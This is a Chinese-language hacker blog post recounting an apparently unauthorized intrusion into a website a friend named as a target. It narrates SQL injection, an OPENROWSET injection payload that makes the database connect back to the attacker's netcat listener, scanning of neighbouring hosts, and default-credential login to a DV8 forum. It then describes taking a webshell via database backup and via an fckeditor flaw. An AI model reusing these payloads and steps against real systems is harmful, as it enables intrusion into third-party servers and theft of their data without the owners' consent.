来源：www.cccpig.cn

本文章没有什么技术含量...大牛飘过...
转载请注明出处.

今天朋友指定网站入侵扔过来一注点,DB权,说是列不到目录,估计是数据库和web分离,让我看看.
打开点,加个'看看..



JJ得..还爆出了路径,先记下.
放到啊D里跑跑看



又记下一个信息,DB权.

列目录,硬是没有找到web路径,倒是看到很多数据库的备份,基本可以确定是数据库分离的了.

现在找找数据库的IP.

本地打开NC,监听1433,当然你选择其他端口也行.



然后打开注点,在后面接个语句';select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=sa;Address=0.0.0.0,1433;','select * from table')--
这里得0.0.0.0是我得IP

看看NC监听到什么?



这里得X.X.206.19就是数据库得IP
(这里得到数据库IP得方法,以前就知道,就是一直没成功,,后来得到Dee大牛得教导...就知道怎么弄了..这里要感谢他)

用IE访问看看



是邮箱,但是在列目录得过程中也没有发现邮箱得目录...

这个很郁闷,估计里面是一个内网吧,我说不清楚.

到了这里就很郁闷..喝口水,,清晰一下思路.

接着,先看看段上有什么吧

扫了一下..发现X.X.206.18 , X.X.206.20连得,都是19这台数据库服务器.

18,20上都有一些站,粗略看了下...

20上有一个DV8..估计刚放上去不久..默认帐号进去了

去后台看看怎样拿shell..我没拿过DV8得..就临时baidu了下..基本都是数据库插一句话..然后备份为xx.asp/123.mdb这样得样子..

问题又来了.传上去得文件..怎么也找不到路径了..后台得附件管理..好像被去掉了..



日了.

赶紧下了份DV8得源码,在本地上跑起来.进后台,找到附件管理,记下连接为uploadlist.asp

回到论坛上,访问/admin/uploadlist.asp

可爱得界面出来了



得到上传文件得路径后,顺利拿到webshell.

但这只是同段得机,要拿到18,就要嗅探..就是要提权..
我是菜鸟..JJ得提不了..
那回可郁闷死.

我在webshell翻着翻着,期望翻出什么有用得东西.
突然..发现一个目录看着很熟悉..
想想...好像是跟原来得注点得程序一样得



我们原来得注点是

http://xxxx.cn/modules/contents_7/front/Leaf_info.asp?leaf_id=4551

从webshell上翻到得目录猜测
contents_7\back得目录下,有fckeditor

访问看看



出现FCK得界面,利用fckeditor得漏洞,成功拿到目标webshell

后来,,,听单练说..还要拿服务器权限...
!@#$%^,我累死了,偷懒去

本文完.